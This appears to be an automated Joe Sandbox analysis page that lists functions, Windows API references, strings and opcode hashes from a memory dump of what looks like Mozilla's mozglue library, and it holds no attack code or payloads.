_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9531A7), ref: 6C990627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C99061B, 6C990625
<jemalloc>, xrefs: 6C9905FA, 6C99060F

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 25db96d4eb97f6669a0a88a1216d998ba0ed13a1334b52ae264f65a75ea91de4
Instruction ID: 4ab761612b90a7cc9a4172cf68e3dfbe69a8d3ff13eb501e7c7b282a36168844
Opcode Fuzzy Hash: 25db96d4eb97f6669a0a88a1216d998ba0ed13a1334b52ae264f65a75ea91de4
Instruction Fuzzy Hash: 1CE08CE2A0101037F614225ABC86DBB7A1CDBDA134F080039FE0D82741E94AFD1A51F7

Function 6C9605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde2914b230708ec333edf2da442098fa2ffc8ec3e3d8488a5b697087bd924fa
Instruction ID: 37056422203d542312f73db08791f16c3d8635f9fd490470ecfef97f7501e69f
Opcode Fuzzy Hash: bde2914b230708ec333edf2da442098fa2ffc8ec3e3d8488a5b697087bd924fa
Instruction Fuzzy Hash: 80A16A70A05605CFDB14CF29C984A99FBF5BF49304F5486AED44AA7B40D730BA95CF90

Function 6C9B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B14E2
GetCurrentThreadId.KERNEL32 ref: 6C9B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C9B15BA
free.MOZGLUE(?), ref: 6C9B16B4

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 770ed80ba0c0b4aa20744db873b38cabef78ec103e14aba8f224427342d16040
Instruction ID: 5603e48839bfa033874eb59e7bb1d8b95b75ccec8b4ea55c9fd9923afc74763e
Opcode Fuzzy Hash: 770ed80ba0c0b4aa20744db873b38cabef78ec103e14aba8f224427342d16040
Instruction Fuzzy Hash: 8561DF72A05700EBDB118F64C880BDEB7B5BF9A308F04851CED8A67711DB31E999CB91

Function 6C9A9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9A9FDB
free.MOZGLUE(?,?), ref: 6C9A9FF0
free.MOZGLUE(?,?), ref: 6C9AA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9AA0BE
free.MOZGLUE(?,?), ref: 6C9AA0D5
free.MOZGLUE(?,?), ref: 6C9AA0EB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 6010b17c64fdc12d60f86bdafdcb9194a1e10ec7c5018c29ffbb07ec0987e6d3
Instruction ID: e92d98efe0ba971143f20b948222a7e7f1b7473426a01bcc9f839b9d99cffe8e
Opcode Fuzzy Hash: 6010b17c64fdc12d60f86bdafdcb9194a1e10ec7c5018c29ffbb07ec0987e6d3
Instruction Fuzzy Hash: 6261DF754096019FC751CF58C48059AB3F5FF98328F148669E8999B702EB32E986CFD1

Function 6C9ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C9AD38A,?), ref: 6C9ADC6F
free.MOZGLUE(?,?,?,?,?,6C9AD38A,?), ref: 6C9ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C9AD38A,?), ref: 6C9ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C9AD38A,?), ref: 6C9ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C9AD38A,?), ref: 6C9ADD4A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 24dc189e55704bb509b1dec34db959b011ff9ef85d3745b0e5c29eb4621a213f
Instruction ID: 935987abb3a558640313b70b9eca53db3ade4ce5fc80780065d94d58081a4af8
Opcode Fuzzy Hash: 24dc189e55704bb509b1dec34db959b011ff9ef85d3745b0e5c29eb4621a213f
Instruction Fuzzy Hash: 52419CB6A00605DFCB00CF99C88099AB7F5FF98304B654469DD05ABB10D731FC01CBA0

Function 6C996590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C98FA80: GetCurrentThreadId.KERNEL32 ref: 6C98FA8D
Part of subcall function 6C98FA80: AcquireSRWLockExclusive.KERNEL32(6C9DF448), ref: 6C98FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C996727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9967C8

Part of subcall function 6C9A4290: memcpy.VCRUNTIME140(?,?,6C9B2003,6C9B0AD9,?,6C9B0AD9,00000000,?,6C9B0AD9,?,00000004,?,6C9B1A62,?,6C9B2003,?), ref: 6C9A42C4

Strings

data, xrefs: 6C996593

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 05005de064831a547376c7b9aa1fad48b7a46f93473802ac7ffeaa75292965f9
Instruction ID: ab996b97badea893eaba6de8e0d50924e7c97fa7344ac8d40f2b1daa6674e183
Opcode Fuzzy Hash: 05005de064831a547376c7b9aa1fad48b7a46f93473802ac7ffeaa75292965f9
Instruction Fuzzy Hash: 48D1DF71A093408FD764CF25C841B9FB7E5AFE5308F14892DE48997B91DB30E949CB92

Function 6C9AC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C9AC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C9AC842

Part of subcall function 6C9ACAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C9CB5EB,00000000), ref: 6C9ACB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C9AC863
std::_Facet_Register.LIBCPMT ref: 6C9AC875

Part of subcall function 6C98B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C9CB636,?), ref: 6C98B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C9AC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AC8BC

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: b4778fe9476e8610c3c7196cac04df22de242c41e3559b0939326dd95945073c
Instruction ID: de425f6e6c87dabd49fb10cc3ef8815e54e3b4c49c74c4dc543ed5eed866ae8f
Opcode Fuzzy Hash: b4778fe9476e8610c3c7196cac04df22de242c41e3559b0939326dd95945073c
Instruction Fuzzy Hash: BB11B675B046099BCB04DFA4C8899AE7BB9FF99354B200529E606AB340DB31E945CB91

Function 6C98D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C95EB57,?,?,?,?,?,?,?,?,?), ref: 6C98D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C95EB57,?), ref: 6C98D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C95EB57,?), ref: 6C98D673
free.MOZGLUE(?), ref: 6C98D888

Strings

|Enabled, xrefs: 6C98D81E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 33468bac1b7514cb4f5a643a888b86f8c67de4f6b023000ef00606f19ac7c165
Instruction ID: ae2d65971eccd17b55a861f867e3a7f3383b642317c9b2e2e44136f856ecc815
Opcode Fuzzy Hash: 33468bac1b7514cb4f5a643a888b86f8c67de4f6b023000ef00606f19ac7c165
Instruction Fuzzy Hash: E4A136B1A063099FDF00CF69C4907AEBBF5AF59318F58845ED885ABB41C731E845CBA1

Function 6C98F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C98F480

Part of subcall function 6C95F100: LoadLibraryW.KERNEL32(shell32,?,6C9CD020), ref: 6C95F122
Part of subcall function 6C95F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C95F132

CloseHandle.KERNEL32(00000000), ref: 6C98F555

Part of subcall function 6C9614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C961248,6C961248,?), ref: 6C9614C9
Part of subcall function 6C9614B0: memcpy.VCRUNTIME140(?,6C961248,00000000,?,6C961248,?), ref: 6C9614EF

Part of subcall function 6C95EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C95EEE3

CreateFileW.KERNEL32 ref: 6C98F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C98F523

Strings

\oleacc.dll, xrefs: 6C98F4CB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: d518d01f0ca43661939582b4f88c497fc29ee32d89852733bd1881840c03363d
Instruction ID: 0ac2ddd907ca895738686994e4bbb0b9dbe59f323118e3fff43de7bcabe9210d
Opcode Fuzzy Hash: d518d01f0ca43661939582b4f88c497fc29ee32d89852733bd1881840c03363d
Instruction Fuzzy Hash: AF41A2306097119FE720DF69D884AAAB7F4AF55318F501E1CF59193690EB30E989CB92

Function 6C9B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C9B7526
__Init_thread_footer.LIBCMT ref: 6C9B7566
__Init_thread_footer.LIBCMT ref: 6C9B7597

Strings

kernel32.dll, xrefs: 6C9B7557
UnmapViewOfFile2, xrefs: 6C9B7552

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 23557f1d40be708f6bbc2a2792f37a9c9aaed32311ae154127c9057c78e59403
Instruction ID: 1df685725a88da7efbf8f0a152a9759a783a643af78f7bd8d018545e3b842531
Opcode Fuzzy Hash: 23557f1d40be708f6bbc2a2792f37a9c9aaed32311ae154127c9057c78e59403
Instruction Fuzzy Hash: C5210631705901B7CB148BE88815EDA73B6EB97B29B158629D40177B80CB31FA4585B1

Function 6C9BA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DF770,-00000001,?,6C9CE330,?,6C97BDF7), ref: 6C9BA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C97BDF7), ref: 6C9BA7C2
moz_xmalloc.MOZGLUE(00000018,?,6C97BDF7), ref: 6C9BA7E4
LeaveCriticalSection.KERNEL32(6C9DF770), ref: 6C9BA80A

Strings

accelerator.dll, xrefs: 6C9BA7BF

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: ba91293ecb05d7c24d36abeef0107773f84bab4f44c617514d488f4734f6b4d5
Instruction ID: da276d4acd9729df64fabebca267984064de832ef571fb0321f01453ca5f3ecf
Opcode Fuzzy Hash: ba91293ecb05d7c24d36abeef0107773f84bab4f44c617514d488f4734f6b4d5
Instruction Fuzzy Hash: 38018FB0608604AFDB04DF55D8C5C5277B8FB89B59715806AE809EB741DB70E800CBA1

Function 6C95F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C95EE51,?), ref: 6C95F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C95F0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C95F0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C95F0DC
ole32, xrefs: 6C95F0AD

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 4b75fef05408374ca99fac264195139c11a3a77d7403fc1ba8592179dcadbaf8
Instruction ID: 6819c9be832eed6dc8d85ec8aa52ad2e586d394a04d03ddbb0110f4c2f98bedb
Opcode Fuzzy Hash: 4b75fef05408374ca99fac264195139c11a3a77d7403fc1ba8592179dcadbaf8
Instruction Fuzzy Hash: 79E0D872348B06DBEF049B72980962737BC5B6322D368C429F602F2E40EE21F020C661

Function 6C990080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C967204), ref: 6C990088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C9900A7
FreeLibrary.KERNEL32(?,6C967204), ref: 6C9900BE

Strings

wintrust.dll, xrefs: 6C990083
CryptCATAdminAcquireContext2, xrefs: 6C9900A1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 55225c4d0e2523e96eecc38002d6bebc24c59a197e5e7a85dcea9ce664e9ddae
Instruction ID: d20e3e39dbff9f72cfa1bae2feb4fb00dd4a293afe26231eb3821f57ad67d7e0
Opcode Fuzzy Hash: 55225c4d0e2523e96eecc38002d6bebc24c59a197e5e7a85dcea9ce664e9ddae
Instruction Fuzzy Hash: BEE09A78648B45ABDF00AF6598097017AF8AB0B749F288465A926E2650DB74F0C0DF62

Function 6C9900D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C967235), ref: 6C9900D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C9900F7
FreeLibrary.KERNEL32(?,6C967235), ref: 6C99010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C9900F1
wintrust.dll, xrefs: 6C9900D3

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: e40693f4fa2832d51e5d9d63547323e5665aebf4246078aeb5eecd231ea008e3
Instruction ID: a18ac8204e8f5146c85344b5b34ff8ae283b667bb3cd655677d721eba4ac65be
Opcode Fuzzy Hash: e40693f4fa2832d51e5d9d63547323e5665aebf4246078aeb5eecd231ea008e3
Instruction Fuzzy Hash: 9DE04F7024DB069BEF005F65C90A7213AFCA707249F349065AA5BB2700DB70F1D0CB62

Function 6C9BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C9BC0E9), ref: 6C9BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C9BC437
FreeLibrary.KERNEL32(?,6C9BC0E9), ref: 6C9BC44C

Strings

ntdll.dll, xrefs: 6C9BC413
NtQueryVirtualMemory, xrefs: 6C9BC431

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 75447116e7f84d1ba79c2c520b1632e2762e3c57e17d798dad06c88f4c80e2b4
Instruction ID: 26514dfef8388c21d50cdb00729a29e21d8465bd9fc3025292338e675392cd70
Opcode Fuzzy Hash: 75447116e7f84d1ba79c2c520b1632e2762e3c57e17d798dad06c88f4c80e2b4
Instruction Fuzzy Hash: B2E0B678609B02ABDF00BF71C9197127BF8A74664DF244556AA06B2750EBB0F1C0CBA2

Function 6C9B75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C9B748B,?), ref: 6C9B75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C9B75D7
FreeLibrary.KERNEL32(?,6C9B748B,?), ref: 6C9B75EC

Strings

ntdll.dll, xrefs: 6C9B75B3
RtlNtStatusToDosError, xrefs: 6C9B75D1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: eb2c4b00dbded57a71e5562010aad004f3ad21e1dd7e22e8143ede82e691d04b
Instruction ID: 40df59ded1a13b81030f65468bd256df80f8dbf679591a478ff7ba88c2647446
Opcode Fuzzy Hash: eb2c4b00dbded57a71e5562010aad004f3ad21e1dd7e22e8143ede82e691d04b
Instruction Fuzzy Hash: 10E0BF71608B02BBDF005FE1C9497827AF8E74665DF309525A915F6640DBB0F2C5CF60

Function 6C9B7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C9B7592), ref: 6C9B7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C9B7627
FreeLibrary.KERNEL32(?,6C9B7592), ref: 6C9B763C

Strings

NtUnmapViewOfSection, xrefs: 6C9B7621
ntdll.dll, xrefs: 6C9B7603

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: a3c78e7a0c4b1b37242d1c006560e891df1f3268808147cad3daf989c851b670
